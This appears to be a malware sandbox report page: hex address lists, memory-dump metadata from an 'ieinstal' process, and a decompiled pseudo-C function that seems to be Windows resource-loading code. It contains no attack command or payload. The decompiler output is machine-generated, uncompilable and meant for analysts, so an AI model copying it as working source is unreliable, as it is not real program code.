                                                                                                                0x1e6b5663
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6b5669
                                                                                                                0x1e6b566f
                                                                                                                0x1e6b5672
                                                                                                                0x1e6b5691
                                                                                                                0x1e6b5696
                                                                                                                0x1e6b5674
                                                                                                                0x1e6b5689
                                                                                                                0x1e6b568e
                                                                                                                0x1e6b569c
                                                                                                                0x1e6b56a1
                                                                                                                0x1e6b56a7
                                                                                                                0x1e6b56ad
                                                                                                                0x1e6b56b1
                                                                                                                0x1e6b56b2
                                                                                                                0x1e6b56b2
                                                                                                                0x1e6b56b7
                                                                                                                0x1e6b56b7
                                                                                                                0x1e661064
                                                                                                                0x1e6b56c8
                                                                                                                0x1e6b56c8
                                                                                                                0x00000000
                                                                                                                0x1e661064
                                                                                                                0x1e6b5520
                                                                                                                0x1e661039
                                                                                                                0x1e6b5542
                                                                                                                0x1e6b5545
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6b554b
                                                                                                                0x1e6b5551
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6b5557
                                                                                                                0x1e6b5559
                                                                                                                0x1e6b556a
                                                                                                                0x1e6b556c
                                                                                                                0x1e6b556d
                                                                                                                0x1e6b5573
                                                                                                                0x1e6b5579
                                                                                                                0x1e6b5579
                                                                                                                0x00000000
                                                                                                                0x1e6b5573
                                                                                                                0x1e6b555d
                                                                                                                0x1e6b5562
                                                                                                                0x1e6b5564
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1e6b5564
                                                                                                                0x00000000
                                                                                                                0x1e661039
                                                                                                                0x1e66100c
                                                                                                                0x1e66100c
                                                                                                                0x1e661012
                                                                                                                0x1e6b54ba
                                                                                                                0x1e6b54bd
                                                                                                                0x1e6b54cc
                                                                                                                0x1e6b54d0
                                                                                                                0x1e6b54d0
                                                                                                                0x1e6b54bd
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                                                • API String ID: 2994545307-3570731704
                                                                                                                • Opcode ID: 639f5d2a722fae97666fb12ecce2c0a9c1d8f1e0c02f2d62714cf3b6886a94ab
                                                                                                                • Instruction ID: 1f89260a7d6b8e8c24b2e31e2cce139b1086a8edf1b6c79ecc92c5e827b27a4b
                                                                                                                • Opcode Fuzzy Hash: 639f5d2a722fae97666fb12ecce2c0a9c1d8f1e0c02f2d62714cf3b6886a94ab
                                                                                                                • Instruction Fuzzy Hash: 3E927975E112A9CFEB20CF25C890B99B7B6BF49310F4586EAD94DAB250D7309E80CF51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E65BDE0 Relevance: 5.7, Strings: 4, Instructions: 694COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E1E65BDE0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8, signed short _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				void* _v4;
				intOrPtr _v16;
				char _v20;
				char _v736;
				char _v796;
				char _v1504;
				char _v1680;
				char _v2384;
				char _v2640;
				char* _v2644;
				char _v2648;
				int _v2652;
				char _v2653;
				char _v2654;
				void* _v2660;
				short _v2662;
				char _v2664;
				intOrPtr _v2668;
				int _v2672;
				char _v2676;
				int _v2684;
				char _v2688;
				char* _v2692;
				short _v2694;
				char _v2696;
				int _v2700;
				void* _v2704;
				char _v2708;
				intOrPtr* _v2712;
				signed int _v2716;
				signed int _v2720;
				short _v2722;
				char _v2724;
				signed int _v2728;
				int _v2732;
				int _v2736;
				signed int _v2740;
				char _v2744;
				int _v2748;
				int _v2752;
				int _v2756;
				void* _v2760;
				intOrPtr _v2768;
				signed int _v2772;
				int _v2780;
				char _v2784;
				char* _v2788;
				char _v2792;
				char _v2800;
				void _v2828;
				char _v2832;
				char _v2836;
				intOrPtr _t299;
				signed int _t300;
				intOrPtr _t301;
				signed int _t302;
				int _t308;
				signed int _t311;
				signed int _t314;
				signed int _t317;
				signed int _t320;
				signed char* _t323;
				signed int _t324;
				signed char* _t325;
				signed int _t334;
				signed int _t336;
				intOrPtr _t337;
				signed int _t338;
				signed int _t340;
				signed int _t350;
				char* _t356;
				int _t369;
				signed int _t373;
				signed int _t376;
				intOrPtr* _t377;
				signed int _t378;
				signed int _t397;
				signed int _t398;
				signed int _t403;
				signed int _t405;
				signed int _t406;
				char* _t410;
				int _t417;
				signed int _t419;
				signed int _t421;
				signed int _t438;
				signed int _t445;
				intOrPtr _t455;
				signed int _t457;
				intOrPtr _t462;
				signed int _t467;
				intOrPtr _t469;
				signed int _t475;
				intOrPtr* _t485;
				signed int _t486;
				signed int _t489;
				signed int _t490;
				signed int _t492;
				intOrPtr* _t493;
				intOrPtr* _t502;
				signed int _t505;
				short _t515;
				void* _t520;
				void* _t527;
				intOrPtr* _t533;
				signed int _t535;
				signed int _t538;
				intOrPtr* _t543;
				signed int _t545;
				signed int _t547;
				signed int _t550;
				intOrPtr _t551;
				signed int _t553;
				void* _t554;

				_push(0xb04);
				_push(0x1e72bfd0);
				E1E6A7C40(__ebx, __edi, __esi);
				_v2668 = _a8;
				_v2728 = _a12 & 0x0000ffff;
				_v2712 = _a16;
				_v2740 = _a20;
				_v2708 = 0;
				_v2752 = 0;
				_t543 = 0;
				_v2704 = 0;
				_v2700 = 0;
				_v2736 = 0;
				_v2676 = 0;
				_v2760 = 0;
				_v2654 = 0;
				_v2836 = 0x24;
				_v2832 = 1;
				_t457 = 7;
				memset( &_v2828, 0, _t457 << 2);
				_v2688 = 0;
				_v2756 = 0;
				_v2732 = 0;
				_v2653 = 1;
				_v2748 = 0;
				_v2716 =  &_v2384;
				_v2744 = 0x2be;
				_v2768 = 1;
				_v2684 = 1;
				_t299 = _v2668;
				if(_t299 == 0) {
					L140:
					_t300 = 0xc000000d;
					goto L8;
				} else {
					_t461 = _v2728;
					if(_v2728 == 0) {
						goto L140;
					} else {
						_t533 = _v2712;
						if(_t533 == 0) {
							goto L140;
						} else {
							_t462 = _t299;
							_t301 = E1E65D530(_t462, _t461,  &_v2676, 4);
							if(_t301 == 0xffffffff) {
								_t535 = _a24 & 0x00400000;
								__eflags = _t535;
								if(_t535 != 0) {
									goto L10;
								} else {
									 *_v2712 = 0;
									_t300 = 0xc00b0006;
									goto L8;
								}
							} else {
								if(_t301 == 0) {
									_t535 = _a24 & 0x00400000;
									__eflags = _t535;
									L10:
									_v2772 = _t535;
									_v2672 = 0;
									__eflags = _t535;
									if(_t535 != 0) {
										_t302 = 0xc0000039;
									} else {
										_t462 = _v2668;
										_t302 = E1E658F1E(_t462,  &_v736, _t462,  &_v2752,  &_v2704,  &_v2700,  &_v2748);
										_t543 = _v2704;
									}
									__eflags = _t302;
									if(_t302 < 0) {
										_t462 = _v2668;
										_t545 = E1E6DF85C(_t462,  &_v736, 0x2be,  &_v2752,  &_v2732,  &_v2700,  &_v2688);
										_v2652 = _t545;
										__eflags = _t545;
										if(_t545 < 0) {
											goto L39;
										} else {
											_t543 = _v2732;
											_v2704 = _t543;
											goto L13;
										}
									} else {
										L13:
										_t334 = _v2752 & 0xfffffffe;
										__eflags = _t334 - 0x2be;
										if(_t334 >= 0x2be) {
											E1E694C68();
											_push(_t554);
											_push(0);
											_push(_t543);
											_push(_t535);
											_t455 = _t462;
											_t336 = E1E670130();
											__eflags = _t336;
											if(_t336 != 0) {
												_t469 =  *0x1e749374; // 0x77a00000
												__eflags = _t455 - _t469;
												if(_t455 >= _t469) {
													_t337 =  *0x1e749378; // 0x1a3000
													_t336 = _t337 + _t469;
													__eflags = _t455 - _t336;
													if(_t455 >= _t336) {
														goto L103;
													} else {
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														goto L104;
													}
													goto L141;
												} else {
													L103:
													_t336 = E1E65D700(_t455,  &_v20);
												}
												L104:
												__eflags = _v16 - _t455;
												if(_v16 != _t455) {
													_push(0x18);
													asm("int 0x29");
												}
											}
											return _t336;
										} else {
											 *((short*)(_t554 + _t334 - 0x2e0)) = 0;
											_t338 = E1E69A910(_t543, 0x7e);
											_pop(_t474);
											__eflags = _t338;
											if(_t338 != 0) {
												_t474 =  &_v736;
												_t340 = E1E6DF42F( &_v736, _t543,  &_v2756);
												__eflags = _t340;
												if(_t340 >= 0) {
													_t543 = _v2756;
													_v2704 = _t543;
													_t502 = _t543;
													_t527 = _t502 + 2;
													do {
														_t445 =  *_t502;
														_t502 = _t502 + 2;
														__eflags = _t445;
													} while (_t445 != 0);
													_t474 = _t502 - _t527 >> 1;
													_v2700 = (_t502 - _t527 >> 1) + (_t502 - _t527 >> 1);
												}
												goto L15;
												L42:
												__eflags = _t308;
												if(_t308 != 0) {
													_push(_v2676);
													_push(_t545);
													asm("sbb edi, edi");
													_t538 = ( ~_t535 & 0x00000020) + 1;
													__eflags = _t538;
													_push(_t538);
													_push(_v2728);
													_push(0);
													_push( &_v2708);
													E1E6593A6(0, _v2668,  &_v2672, _t538, _t545, _t538);
												}
												__eflags = _v2672 - 0xffffffff;
												if(_v2672 == 0xffffffff) {
													 *_v2712 = 0;
												} else {
													_t320 = E1E663C40();
													__eflags = _t320;
													if(_t320 != 0) {
														_t323 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
													} else {
														_t323 = 0x7ffe0385;
													}
													__eflags =  *_t323 & 0x00000001;
													if(( *_t323 & 0x00000001) != 0) {
														_t324 = E1E663C40();
														__eflags = _t324;
														if(_t324 == 0) {
															_t325 = 0x7ffe0384;
														} else {
															_t325 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
														}
														E1E6DFC01( &_v2664,  *_t325 & 0x000000ff);
													}
													_v4 = 2;
													 *_v2712 = _v2672;
													_t467 = _v2740;
													__eflags = _t467;
													if(_t467 != 0) {
														 *_t467 = _v2676;
													}
													_t547 = 0;
													_v2652 = 0;
													_v4 = 0xfffffffe;
												}
												__eflags = _v2732;
												if(_v2732 != 0) {
													E1E663BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v2732);
												}
												_t311 = _v2756;
												__eflags = _t311;
												if(_t311 != 0) {
													E1E663BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t311);
													_t547 = _v2652;
												}
												_t314 = _v2736;
												__eflags = _t314;
												if(_t314 != 0) {
													E1E663BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t314);
													_t547 = _v2652;
												}
												_t317 = _v2716;
												__eflags = _t317;
												if(_t317 != 0) {
													__eflags =  &_v2384 - _t317;
													if( &_v2384 != _t317) {
														E1E663BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t317);
														_t547 = _v2652;
													}
												}
												_t300 = _t547;
												goto L8;
											}
											L15:
											E1E695050(_t474,  &_v2724, 0);
											E1E695050(_t474,  &_v2696, 0);
											_v2788 =  &_v1504;
											_v2792 = 0x2be0000;
											_v2780 = 0;
											_v2784 = 0;
											_t475 = _v2700;
											_t515 = 0x3c;
											__eflags = _t475 + 0xc - _t515;
											if(_t475 + 0xc > _t515) {
												_t350 = E1E665D90(_t475,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xa + _t475 * 2);
												_v2736 = _t350;
												__eflags = _t350;
												if(_t350 == 0) {
													_t545 = 0xc0000017;
													goto L130;
												} else {
													_v2720 = _t350;
													_v2722 = 0xa + _v2700 * 2;
													_t543 = _v2704;
													goto L17;
												}
											} else {
												_v2720 =  &_v796;
												_v2722 = _t515;
												L17:
												_v2724 = 0;
												_t545 = E1E65FE40(_t475,  &_v2724, _t543);
												_v2652 = _t545;
												__eflags = _t545;
												if(_t545 >= 0) {
													__eflags = _a24 & 0x01000000;
													_t356 = L".mun";
													if((_a24 & 0x01000000) == 0) {
														_t356 = L".mui";
													}
													_t545 = E1E65FE40(_t475,  &_v2724, _t356);
													_v2652 = _t545;
													__eflags = _t545;
													if(_t545 >= 0) {
														_t359 = _v2748;
														__eflags = _v2748;
														if(__eflags != 0) {
															E1E66DC40( &_v2836, _t359);
														}
														_v4 = 1;
														_v2652 = _t545;
														_push( &_v2760);
														_push( &_v2784);
														_push( &_v2792);
														_t517 = _v2728;
														_t550 = E1E659046(0,  &_v2724, _v2728, _t535, _t545, __eflags);
														_v2652 = _t550;
														_v4 = 0xfffffffe;
														E1E65C617(_t364);
														__eflags = _t550;
														if(_t550 >= 0) {
															_v2654 = 1;
															_t478 = _v2760;
															_v2660 =  *((intOrPtr*)(_t478 + 4));
															_v2664 =  *_t478;
															_v2662 =  *((intOrPtr*)(_t478 + 2));
														}
														__eflags = _v2654;
														if(_v2654 != 0) {
															_v2692 = 0;
															_t369 = 0;
															_v2684 = 0;
															goto L34;
														} else {
															_v2660 =  &_v1504;
															_v2664 = 0x2be0000;
															_t553 = _a24 & 0x01000000;
															__eflags = _t553;
															if(_t553 != 0) {
																_t493 =  &_v736;
																_t517 = _t493 + 2;
																do {
																	_t405 =  *_t493;
																	_t493 = _t493 + 2;
																	__eflags = _t405;
																} while (_t405 != 0);
																_t406 = _t554 + (_t493 - _t517 >> 1) * 2 - 0x2e4;
																while(1) {
																	__eflags = _t406 -  &_v736;
																	if(_t406 <=  &_v736) {
																		break;
																	}
																	__eflags =  *_t406 - 0x5c;
																	if( *_t406 != 0x5c) {
																		_t406 = _t406 - 2;
																		__eflags = _t406;
																		continue;
																	}
																	break;
																}
																__eflags = _t406 -  &_v736;
																if(_t406 <=  &_v736) {
																	_t545 = 0xc000008a;
																	goto L130;
																} else {
																	_t478 = 0;
																	 *((short*)(_t406 + 2)) = 0;
																	E1E65FE40(0,  &_v2664,  &_v736);
																	_t410 = L"SystemResources\\";
																	goto L26;
																}
															} else {
																_t410 =  &_v736;
																L26:
																E1E65FE40(_t478,  &_v2664, _t410);
																__eflags = _t553;
																if(_t553 != 0) {
																	L29:
																	E1E65FE40(_t478,  &_v2664, _v2720);
																	__eflags = _t553;
																	if(_t553 != 0) {
																		L33:
																		_t369 = _v2684;
																		L34:
																		_t545 = E1E6591E5(_v2668,  &_v2664, _v2688, _a24, _v2692, _t369,  &_v2708,  &_v2676,  &_v2672);
																		_v2652 = _t545;
																		__eflags = _t545 - 0xc0000034;
																		if(_t545 == 0xc0000034) {
																			L59:
																			_v2644 =  &_v2640;
																			_v2648 = 0x1000000;
																			_v2640 = 0;
																			_t373 = E1E66C7E7( &_v2648,  &_v2664);
																			__eflags = _t373;
																			if(_t373 >= 0) {
																				E1E65FCF0( &_v2648,  &_v2648);
																				_t397 =  *[fs:0x18];
																				_t489 =  *(_t397 + 0xfdc);
																				__eflags = _t489;
																				if(_t489 < 0) {
																					_t397 = _t397 + _t489;
																					__eflags = _t397;
																				}
																				__eflags = _t397 -  *((intOrPtr*)(_t397 + 0x18));
																				if(_t397 !=  *((intOrPtr*)(_t397 + 0x18))) {
																					_t551 =  *((intOrPtr*)(_t397 + 0x14c0));
																				} else {
																					_t551 =  *((intOrPtr*)(_t397 + 0xe30));
																				}
																				_t398 =  *[fs:0x18];
																				_t490 =  *(_t398 + 0xfdc);
																				__eflags = _t490;
																				if(_t490 < 0) {
																					_t398 = _t398 + _t490;
																					__eflags = _t398;
																				}
																				__eflags = _t398 -  *((intOrPtr*)(_t398 + 0x18));
																				if(_t398 !=  *((intOrPtr*)(_t398 + 0x18))) {
																					 *((intOrPtr*)(_t398 + 0x14c0)) = 1;
																					 *((intOrPtr*)(_t398 + 0x14c4)) = 0;
																				} else {
																					 *((intOrPtr*)(_t398 + 0xe30)) = 1;
																				}
																				_v2652 = E1E6591E5(_v2668,  &_v2648, _v2688, _a24, _v2692, _v2684,  &_v2708,  &_v2676,  &_v2672);
																				_t403 =  *[fs:0x18];
																				_t492 =  *(_t403 + 0xfdc);
																				__eflags = _t492;
																				if(_t492 < 0) {
																					_t403 = _t403 + _t492;
																					__eflags = _t403;
																				}
																				__eflags = _t403 -  *((intOrPtr*)(_t403 + 0x18));
																				if(_t403 !=  *((intOrPtr*)(_t403 + 0x18))) {
																					 *((intOrPtr*)(_t403 + 0x14c0)) = _t551;
																					 *((intOrPtr*)(_t403 + 0x14c4)) = 0;
																				} else {
																					 *((intOrPtr*)(_t403 + 0xe30)) = _t551;
																				}
																				_t545 = _v2652;
																			}
																			__eflags =  &_v2640 - _v2644;
																			if( &_v2640 != _v2644) {
																				E1E64BA80(_v2644);
																			}
																		} else {
																			__eflags = _t545 - 0xc000003a;
																			if(_t545 == 0xc000003a) {
																				goto L59;
																			}
																		}
																		__eflags = _a24 & 0x01000000;
																		if((_a24 & 0x01000000) == 0) {
																			__eflags = _t545 - 0xc000003a;
																			if(_t545 == 0xc000003a) {
																				L81:
																				_t376 = E1E687D8F( &_v736,  &_v1504);
																				__eflags = _t376;
																				if(_t376 != 0) {
																					_t377 =  &_v1504;
																					_v2660 = _t377;
																					_t485 = _t377;
																					_t520 = _t485 + 2;
																					do {
																						_t378 =  *_t485;
																						_t485 = _t485 + 2;
																						__eflags = _t378;
																					} while (_t378 != 0);
																					_t486 = _t485 - _t520;
																					__eflags = _t486;
																					_t487 = _t486 >> 1;
																					_v2664 = (_t486 >> 1) + (_t486 >> 1);
																					_v2662 = 0x2be;
																					E1E65FE40(_t486 >> 1,  &_v2664, "\\");
																					E1E6710D0(_t487,  &_v2664,  &_v2696);
																					E1E65FE40(_t487,  &_v2664, "\\");
																					E1E65FE40(_t487,  &_v2664, _v2720);
																					_t545 = E1E6591E5(_v2668,  &_v2664, _v2688, _a24, _v2692, _v2684,  &_v2708,  &_v2676,  &_v2672);
																					goto L130;
																				}
																			} else {
																				__eflags = _t545 - 0xc0000034;
																				if(_t545 == 0xc0000034) {
																					goto L81;
																				}
																			}
																		}
																	} else {
																		_t498 = _v2692;
																		_t417 = E1E658DBB(_v2692, _v2660,  &_v2744,  &_v2384);
																		_v2652 = _t417;
																		__eflags = _t417 - 0xc0000023;
																		if(_t417 == 0xc0000023) {
																			_t419 = E1E665D90(_t498,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v2744);
																			_v2716 = _t419;
																			__eflags = _t419;
																			if(_t419 == 0) {
																				goto L32;
																			} else {
																				_v2652 = E1E658DBB(_v2692, _v2660,  &_v2744, _t419);
																				goto L31;
																			}
																			goto L42;
																		} else {
																			L31:
																			_t419 = _v2716;
																		}
																		L32:
																		__eflags = _v2652;
																		if(_v2652 >= 0) {
																			_t421 = E1E671D10( &_v2800, _t419);
																			__eflags = _t421;
																			if(_t421 < 0) {
																				goto L33;
																			} else {
																				_t545 = E1E6591E5(_v2668,  &_v2800, _v2688, _a24, _v2692, 2,  &_v2708,  &_v2676,  &_v2672);
																				_v2652 = _t545;
																				__eflags = _t545;
																				if(_t545 < 0) {
																					__eflags = _t545 - 0xc0000034;
																					if(__eflags != 0) {
																						E1E6D0961(_t545,  &_v2800, __eflags, _v2688, _a24,  &_v2696);
																					}
																					goto L33;
																				} else {
																					E1E671D10( &_v2664, _v2716);
																				}
																			}
																		} else {
																			goto L33;
																		}
																	}
																} else {
																	_v2692 =  &_v1680;
																	_v2694 = 0xaa;
																	_t438 = E1E675A40(_t517, _v2728 & 0x0000ffff,  &_v2696, 2, 0);
																	__eflags = _t438;
																	if(_t438 < 0) {
																		_t545 = 0xc000000d;
																		L130:
																		_v2652 = _t545;
																	} else {
																		E1E6710D0(_t478,  &_v2664,  &_v2696);
																		E1E65FE40(_t478,  &_v2664, "\\");
																		goto L29;
																	}
																}
															}
														}
													}
												}
											}
											L39:
											__eflags = _v2672;
											if(_v2672 == 0) {
												_v2672 = _v2672 | 0xffffffff;
											}
											__eflags = _t545;
											if(_t545 < 0) {
												__eflags = _t545 - 0xc000012d;
												if(_t545 == 0xc000012d) {
													L131:
													_t308 = 0;
												} else {
													__eflags = _t545 - 0xc00000a5;
													if(_t545 == 0xc00000a5) {
														goto L131;
													} else {
														__eflags = _t545 - 0xc0000017;
														if(_t545 != 0xc0000017) {
															goto L41;
														} else {
															goto L131;
														}
													}
												}
											} else {
												L41:
												_t308 = _v2653;
											}
											goto L42;
										}
									}
								} else {
									_v4 = 0;
									 *_t533 = _t301;
									_t505 = _v2740;
									if(_t505 != 0) {
										 *_t505 = _v2676;
									}
									_v2652 = 0;
									_v4 = 0xfffffffe;
									_t300 = 0;
									L8:
									 *[fs:0x0] = _v16;
									return _t300;
								}
							}
						}
					}
				}
				L141:
			}





















































































































                                                                                                                0x1e65bde0
                                                                                                                0x1e65bde5
                                                                                                                0x1e65bdea
                                                                                                                0x1e65bdf2
                                                                                                                0x1e65bdfc
                                                                                                                0x1e65be05
                                                                                                                0x1e65be0e
                                                                                                                0x1e65be16
                                                                                                                0x1e65be1c
                                                                                                                0x1e65be22
                                                                                                                0x1e65be24
                                                                                                                0x1e65be2a
                                                                                                                0x1e65be30
                                                                                                                0x1e65be36
                                                                                                                0x1e65be3c
                                                                                                                0x1e65be42
                                                                                                                0x1e65be48
                                                                                                                0x1e65be55
                                                                                                                0x1e65be5d
                                                                                                                0x1e65be66
                                                                                                                0x1e65be68
                                                                                                                0x1e65be6e
                                                                                                                0x1e65be74
                                                                                                                0x1e65be7a
                                                                                                                0x1e65be80
                                                                                                                0x1e65be8c
                                                                                                                0x1e65be92
                                                                                                                0x1e65be9c
                                                                                                                0x1e65bea2
                                                                                                                0x1e65bea8
                                                                                                                0x1e65beb0
                                                                                                                0x1e6b3cea
                                                                                                                0x1e6b3cea
                                                                                                                0x00000000
                                                                                                                0x1e65beb6
                                                                                                                0x1e65beb6
                                                                                                                0x1e65bebf
                                                                                                                0x00000000
                                                                                                                0x1e65bec5
                                                                                                                0x1e65bec5
                                                                                                                0x1e65becd
                                                                                                                0x00000000
                                                                                                                0x1e65bed3
                                                                                                                0x1e65bede
                                                                                                                0x1e65bee0
                                                                                                                0x1e65bee8
                                                                                                                0x1e65c33e
                                                                                                                0x1e65c33e
                                                                                                                0x1e65c344
                                                                                                                0x00000000
                                                                                                                0x1e65c34a
                                                                                                                0x1e65c350
                                                                                                                0x1e65c352
                                                                                                                0x00000000
                                                                                                                0x1e65c352
                                                                                                                0x1e65beee
                                                                                                                0x1e65bef0
                                                                                                                0x1e65bf2d
                                                                                                                0x1e65bf2d
                                                                                                                0x1e65bf33
                                                                                                                0x1e65bf33
                                                                                                                0x1e65bf39
                                                                                                                0x1e65bf3f
                                                                                                                0x1e65bf41
                                                                                                                0x1e6b3974
                                                                                                                0x1e65bf47
                                                                                                                0x1e65bf6a
                                                                                                                0x1e65bf70
                                                                                                                0x1e65bf75
                                                                                                                0x1e65bf75
                                                                                                                0x1e65bf7b
                                                                                                                0x1e65bf7d
                                                                                                                0x1e6b39a5
                                                                                                                0x1e6b39b0
                                                                                                                0x1e6b39b2
                                                                                                                0x1e6b39b8
                                                                                                                0x1e6b39ba
                                                                                                                0x00000000
                                                                                                                0x1e6b39c0
                                                                                                                0x1e6b39c0
                                                                                                                0x1e6b39c6
                                                                                                                0x00000000
                                                                                                                0x1e6b39c6
                                                                                                                0x1e65bf83
                                                                                                                0x1e65bf83
                                                                                                                0x1e65bf89
                                                                                                                0x1e65bf8c
                                                                                                                0x1e65bf91
                                                                                                                0x1e65c62e
                                                                                                                0x1e65c635
                                                                                                                0x1e65c63b
                                                                                                                0x1e65c63c
                                                                                                                0x1e65c63d
                                                                                                                0x1e65c63e
                                                                                                                0x1e65c640
                                                                                                                0x1e65c645
                                                                                                                0x1e65c647
                                                                                                                0x1e65c649
                                                                                                                0x1e65c64f
                                                                                                                0x1e65c651
                                                                                                                0x1e65c66c
                                                                                                                0x1e65c671
                                                                                                                0x1e65c673
                                                                                                                0x1e65c675
                                                                                                                0x00000000
                                                                                                                0x1e65c677
                                                                                                                0x1e65c67f
                                                                                                                0x1e65c680
                                                                                                                0x1e65c681
                                                                                                                0x1e65c682
                                                                                                                0x00000000
                                                                                                                0x1e65c682
                                                                                                                0x00000000
                                                                                                                0x1e65c653
                                                                                                                0x1e65c653
                                                                                                                0x1e65c658
                                                                                                                0x1e65c658
                                                                                                                0x1e65c65d
                                                                                                                0x1e65c65d
                                                                                                                0x1e65c660
                                                                                                                0x1e65c662
                                                                                                                0x1e65c665
                                                                                                                0x1e65c665
                                                                                                                0x1e65c660
                                                                                                                0x1e65c66b
                                                                                                                0x1e65bf97
                                                                                                                0x1e65bf99
                                                                                                                0x1e65bfa4
                                                                                                                0x1e65bfaa
                                                                                                                0x1e65bfab
                                                                                                                0x1e65bfad
                                                                                                                0x1e6b39da
                                                                                                                0x1e6b39e0
                                                                                                                0x1e6b39e5
                                                                                                                0x1e6b39e7
                                                                                                                0x1e6b39ed
                                                                                                                0x1e6b39f3
                                                                                                                0x1e6b39f9
                                                                                                                0x1e6b39fb
                                                                                                                0x1e6b39fe
                                                                                                                0x1e6b39fe
                                                                                                                0x1e6b3a01
                                                                                                                0x1e6b3a04
                                                                                                                0x1e6b3a04
                                                                                                                0x1e6b3a0b
                                                                                                                0x1e6b3a10
                                                                                                                0x1e6b3a10
                                                                                                                0x00000000
                                                                                                                0x1e65c262
                                                                                                                0x1e65c262
                                                                                                                0x1e65c264
                                                                                                                0x1e65c266
                                                                                                                0x1e65c26c
                                                                                                                0x1e65c26f
                                                                                                                0x1e65c274
                                                                                                                0x1e65c274
                                                                                                                0x1e65c275
                                                                                                                0x1e65c276
                                                                                                                0x1e65c27c
                                                                                                                0x1e65c283
                                                                                                                0x1e65c290
                                                                                                                0x1e65c290
                                                                                                                0x1e65c295
                                                                                                                0x1e65c29c
                                                                                                                0x1e65c4a0
                                                                                                                0x1e65c2a2
                                                                                                                0x1e65c2a2
                                                                                                                0x1e65c2a7
                                                                                                                0x1e65c2a9
                                                                                                                0x1e6b3c2b
                                                                                                                0x1e65c2af
                                                                                                                0x1e65c2af
                                                                                                                0x1e65c2af
                                                                                                                0x1e65c2b4
                                                                                                                0x1e65c2b7
                                                                                                                0x1e6b3c35
                                                                                                                0x1e6b3c3a
                                                                                                                0x1e6b3c3c
                                                                                                                0x1e6b3c4e
                                                                                                                0x1e6b3c3e
                                                                                                                0x1e6b3c47
                                                                                                                0x1e6b3c47
                                                                                                                0x1e6b3c5c
                                                                                                                0x1e6b3c5c
                                                                                                                0x1e65c2bd
                                                                                                                0x1e65c2d0
                                                                                                                0x1e65c2d2
                                                                                                                0x1e65c2d8
                                                                                                                0x1e65c2da
                                                                                                                0x1e65c2e2
                                                                                                                0x1e65c2e2
                                                                                                                0x1e65c2e4
                                                                                                                0x1e65c2e6
                                                                                                                0x1e65c2ec
                                                                                                                0x1e65c2ec
                                                                                                                0x1e65c2f3
                                                                                                                0x1e65c2fa
                                                                                                                0x1e6b3ca4
                                                                                                                0x1e6b3ca9
                                                                                                                0x1e65c300
                                                                                                                0x1e65c306
                                                                                                                0x1e65c308
                                                                                                                0x1e6b3cbf
                                                                                                                0x1e6b3cc4
                                                                                                                0x1e6b3cc4
                                                                                                                0x1e65c30e
                                                                                                                0x1e65c314
                                                                                                                0x1e65c316
                                                                                                                0x1e65c54d
                                                                                                                0x1e65c552
                                                                                                                0x1e65c552
                                                                                                                0x1e65c31c
                                                                                                                0x1e65c322
                                                                                                                0x1e65c324
                                                                                                                0x1e65c32c
                                                                                                                0x1e65c32e
                                                                                                                0x1e6b3cda
                                                                                                                0x1e6b3cdf
                                                                                                                0x1e6b3cdf
                                                                                                                0x1e65c32e
                                                                                                                0x1e65c334
                                                                                                                0x00000000
                                                                                                                0x1e65c334
                                                                                                                0x1e65bfb3
                                                                                                                0x1e65bfbb
                                                                                                                0x1e65bfc8
                                                                                                                0x1e65bfd3
                                                                                                                0x1e65bfd9
                                                                                                                0x1e65bfe3
                                                                                                                0x1e65bfeb
                                                                                                                0x1e65bff1
                                                                                                                0x1e65bffc
                                                                                                                0x1e65bffd
                                                                                                                0x1e65bfff
                                                                                                                0x1e65c50a
                                                                                                                0x1e65c50f
                                                                                                                0x1e65c515
                                                                                                                0x1e65c517
                                                                                                                0x1e6b3a1b
                                                                                                                0x00000000
                                                                                                                0x1e65c51d
                                                                                                                0x1e65c51d
                                                                                                                0x1e65c530
                                                                                                                0x1e65c537
                                                                                                                0x00000000
                                                                                                                0x1e65c537
                                                                                                                0x1e65c005
                                                                                                                0x1e65c00b
                                                                                                                0x1e65c011
                                                                                                                0x1e65c018
                                                                                                                0x1e65c01a
                                                                                                                0x1e65c02e
                                                                                                                0x1e65c030
                                                                                                                0x1e65c036
                                                                                                                0x1e65c038
                                                                                                                0x1e65c03e
                                                                                                                0x1e65c045
                                                                                                                0x1e65c04a
                                                                                                                0x1e65c04c
                                                                                                                0x1e65c04c
                                                                                                                0x1e65c05e
                                                                                                                0x1e65c060
                                                                                                                0x1e65c066
                                                                                                                0x1e65c068
                                                                                                                0x1e65c06e
                                                                                                                0x1e65c074
                                                                                                                0x1e65c076
                                                                                                                0x1e65c5ca
                                                                                                                0x1e65c5ca
                                                                                                                0x1e65c07c
                                                                                                                0x1e65c083
                                                                                                                0x1e65c08f
                                                                                                                0x1e65c096
